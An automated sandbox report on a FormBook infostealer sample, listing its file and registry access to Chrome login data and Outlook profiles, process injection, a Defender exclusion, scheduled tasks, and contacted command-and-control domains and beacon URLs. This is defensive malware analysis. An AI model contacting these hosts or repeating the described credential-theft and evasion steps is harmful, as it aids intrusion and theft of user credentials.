            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeQueries volume information: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\zjplj4.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeQueries volume information: C:\Users\user\AppData\Local\Temp\6jkxvjx.zip VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E88B90 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,19_2_61E88B90
            Source: C:\Users\user\Desktop\ekte.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
            Source: C:\Windows\SysWOW64\findstr.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E29157 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_blob,19_2_61E29157
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E290EA sqlite3_bind_zeroblob,sqlite3_mutex_leave,19_2_61E290EA
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E290B9 sqlite3_bind_null,sqlite3_mutex_leave,19_2_61E290B9
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E29093 sqlite3_bind_int,sqlite3_bind_int64,19_2_61E29093
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E29044 sqlite3_bind_int64,sqlite3_mutex_leave,19_2_61E29044
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E2923E sqlite3_bind_zeroblob64,sqlite3_mutex_enter,sqlite3_bind_zeroblob,sqlite3_mutex_leave,19_2_61E2923E
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E03568 sqlite3_bind_parameter_name,19_2_61E03568
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E03556 sqlite3_bind_parameter_count,19_2_61E03556
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E13A33 sqlite3_bind_parameter_index,19_2_61E13A33
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E16CEE sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,19_2_61E16CEE
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28FDF sqlite3_bind_double,sqlite3_mutex_leave,19_2_61E28FDF
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28FB8 sqlite3_bind_text16,19_2_61E28FB8
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28F4B sqlite3_bind_text64,19_2_61E28F4B
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28F24 sqlite3_bind_text,19_2_61E28F24
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28EDD sqlite3_bind_blob64,19_2_61E28EDD
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E28EB6 sqlite3_mutex_leave,sqlite3_bind_blob,19_2_61E28EB6
            Source: C:\Windows\SysWOW64\findstr.exeCode function: 19_2_61E16EBE sqlite3_mutex_enter,sqlite3_mutex_leave,sqlite3_transfer_bindings,19_2_61E16EBE

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Command and Scripting Interpreter            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Scheduled Task/Job            		1
            Scheduled Task/Job            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)312
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager16
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            Scheduled Task/Job            		4
            Obfuscated Files or Information            		NTDS12
            Security Software Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
            Software Packing            		LSA Secrets2
            Process Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials41
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            Masquerading            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
            Virtualization/Sandbox Evasion            		Proc Filesystem1
            Remote System Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
            Process Injection            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1538477 Sample: ekte.exe Startdate: 21/10/2024 Architecture: WINDOWS Score: 100 57 www.martaschrimpf.info 2->57 77 Suricata IDS alerts for network traffic 2->77 79 Malicious sample detected (through community Yara rule) 2->79 81 Antivirus / Scanner detection for submitted sample 2->81 83 8 other signatures 2->83 10 ekte.exe 1 11 2->10         started        14 taskeng.exe 1 2->14         started        signatures3 process4 file5 51 C:\Users\user\AppData\...\eFDiSxeTfjUqTk.exe, PE32 10->51 dropped 53 C:\...\eFDiSxeTfjUqTk.exe:Zone.Identifier, ASCII 10->53 dropped 55 C:\Users\user\AppData\Local\...\tmp47BA.tmp, XML 10->55 dropped 93 Uses schtasks.exe or at.exe to add and modify task schedules 10->93 95 Adds a directory exclusion to Windows Defender 10->95 97 Injects a PE file into a foreign processes 10->97 16 ekte.exe 10->16         started        19 powershell.exe 4 10->19         started        21 powershell.exe 4 10->21         started        23 schtasks.exe 10->23         started        25 eFDiSxeTfjUqTk.exe 4 14->25         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 16->67 27 BuhvZTwGQCD.exe 16->27 injected 69 Antivirus detection for dropped file 25->69 71 Multi AV Scanner detection for dropped file 25->71 73 Machine Learning detection for dropped file 25->73 75 2 other signatures 25->75 30 schtasks.exe 25->30         started        32 eFDiSxeTfjUqTk.exe 25->32         started        34 powershell.exe 25->34         started        36 powershell.exe 25->36         started        process9 signatures10 99 Maps a DLL or memory area into another process 27->99 101 Found direct / indirect Syscall (likely to bypass EDR) 27->101 38 findstr.exe 1 21 27->38         started        process11 dnsIp12 59 www.sqlite.org 45.33.6.223, 49168, 49169, 80 LINODE-APLinodeLLCUS United States 38->59 49 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32 38->49 dropped 85 Tries to steal Mail credentials (via file / registry access) 38->85 87 Tries to harvest and steal browser information (history, passwords, etc) 38->87 89 Maps a DLL or memory area into another process 38->89 91 Queues an APC in another process (thread injection) 38->91 43 BuhvZTwGQCD.exe 38->43 injected 47 firefox.exe 38->47         started        file13 signatures14 process15 dnsIp16 61 www.guldeu.xyz 43->61 63 asiapartnars.online 15.197.148.33, 49178, 49179, 49180 TANDEMUS United States 43->63 65 11 other IPs or domains 43->65 103 Found direct / indirect Syscall (likely to bypass EDR) 43->103 signatures17 105 Performs DNS queries to domains with low reputation 61->105

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ekte.exe63%ReversingLabsWin32.Infostealer.Generic
            ekte.exe100%AviraTR/Kryptik.oucnm
            ekte.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe100%AviraTR/Kryptik.oucnm
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\sqlite3.dll0%ReversingLabs
            C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe63%ReversingLabsWin32.Infostealer.Generic

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://www.chiark.greenend.org.uk/~sgtatham/putty/00%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://www.sqlite.org/copyright.html.0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		unknown
              rockbull.pro
              		185.174.173.22
              		truetrue
                		unknown
                wdgb23.top
                		206.119.82.148
                		truetrue
                  		unknown
                  www.martaschrimpf.info
                  		208.91.197.27
                  		truetrue
                    		unknown
                    www.guldeu.xyz
                    		162.0.238.246
                    		truetrue
                      		unknown
                      deikamalaharris.info
                      		3.33.130.190
                      		truetrue
                        		unknown
                        childlesscatlady.today
                        		15.197.148.33
                        		truetrue
                          		unknown
                          asiapartnars.online
                          		15.197.148.33
                          		truetrue
                            		unknown
                            www.sqlite.org
                            		45.33.6.223
                            		truefalse
                              		unknown
                              www.timetime.store
                              		unknown
                              		unknowntrue
                                		unknown
                                www.childlesscatlady.today
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.rockbull.pro
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.asiapartnars.online
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.wdgb23.top
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.deikamalaharris.info
                                        		unknown
                                        		unknowntrue
                                          		unknown

                                          Contacted URLs

                                          NameMaliciousAntivirus DetectionReputation
                                          http://www.wdgb23.top/v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8Strue
                                            		unknown
                                            http://www.rockbull.pro/0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8Strue
                                              		unknown
                                              http://www.guldeu.xyz/qd68/true
                                                		unknown
                                                http://www.childlesscatlady.today/0l08/true
                                                  		unknown
                                                  http://www.sqlite.org/2021/sqlite-dll-win32-x86-3340000.zipfalse
                                                    		unknown
                                                    http://www.deikamalaharris.info/7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8Strue
                                                      		unknown
                                                      http://www.guldeu.xyz/qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8Strue
                                                        		unknown
                                                        http://www.childlesscatlady.today/0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8Strue
                                                          		unknown
                                                          http://www.rockbull.pro/0804/true
                                                            		unknown
                                                            http://www.sqlite.org/2017/sqlite-dll-win32-x86-3180000.zipfalse
                                                              		unknown
                                                              http://www.asiapartnars.online/rmem/true
                                                                		unknown
                                                                http://www.wdgb23.top/v5ff/true
                                                                  		unknown

                                                                  URLs from Memory and Binaries

                                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                                  https://duckduckgo.com/chrome_newtabfindstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.childlesscatlady.todayBuhvZTwGQCD.exe, 00000014.00000002.626793041.0000000000654000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://duckduckgo.com/ac/?q=findstr.exe, 00000013.00000003.464119526.0000000005F9A000.00000004.00000020.00020000.00000000.sdmp, 6z95F416.19.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
